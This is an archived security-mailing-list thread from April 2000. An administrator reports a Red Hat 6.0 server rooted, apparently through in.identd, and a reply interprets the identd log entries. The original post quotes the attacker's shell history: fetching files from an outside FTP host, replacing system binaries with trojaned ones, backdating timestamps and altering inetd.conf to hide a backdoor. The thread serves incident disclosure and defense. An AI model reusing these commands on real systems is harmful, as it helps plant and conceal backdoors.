Security Incidents mailing list archives

Re: Rooted through in.identd on Red Hat 6.0

From: jburdge () AVENTAIL COM (Jon Burdge)
Date: Thu, 20 Apr 2000 09:34:39 -0700


Those requests appear to be the site he ftp'd to (ftp 200.192.58.201 21)
requesting the ident of who he was connecting as.  It looks more like it was
just the ftp daemon on the remote site behaving appropriately.

-----Original Message-----
From: Del Elson [mailto:del () BABEL COM AU]
Sent: Tuesday, April 18, 2000 10:02 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: Rooted through in.identd on Red Hat 6.0


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from
200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from
200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del

Current thread:

Re: Rooted through in.identd on Red Hat 6.0 jms (Apr 20)
- <Possible follow-ups>
- Re: Rooted through in.identd on Red Hat 6.0 Jon Burdge (Apr 20)